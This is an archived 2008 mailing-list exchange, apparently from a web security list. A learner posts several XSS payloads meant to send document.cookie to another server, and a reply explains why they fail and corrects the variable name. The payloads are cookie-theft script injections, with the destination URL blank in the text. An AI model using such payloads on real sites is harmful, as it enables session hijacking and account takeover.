romain r at fuckthespam.com
Thu Jun 5 10:53:55 EDT 2008

Well, the last one should work if you remove the 's' at cookies.
The variable is document.cookie.
Otherwise, document.cookie is a variable accessible from JS, not HTML directly which means 
  that if you write: <a href="document.cookie"> (close to your <script> stuff) it will 
write 'document.cookie' in your address bar and not the content of it.


GsNaseer Gs wrote:
> Hi!
> I am new to this forum, I was practising to learn to concepts of 
> XSS(Cross-Site-Scripting), I am using two different applications on two 
> different machines. i want to dump cookies of one application into 
> another application database. For that i am using
> this script to send cookies, 
> <script 
> src=""+document.cookies>
> <script 
> src=""+escape(document.cookies)>
> <script>new 
> Image().src=""+encodeURI(document.cookies)</script>
> /*Non of these scripts are working for me*/
> i am able to dump a blank record without any cookies values (null) , i 
> am trying out this on IE 7
> pls can anybody help me, and guide to through where i am wrong........
> Thanks
> ------------------------------------------------------------------------
> Best Jokes, Best Friends, Best Food. Get all this and more on Best of 
> Yahoo! Groups. 
> <http://in.rd.yahoo.com/tagline_groups_11/*http://in.promos.yahoo.com/groups/bestofyahoo/>

Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn

More information about the websecurity mailing list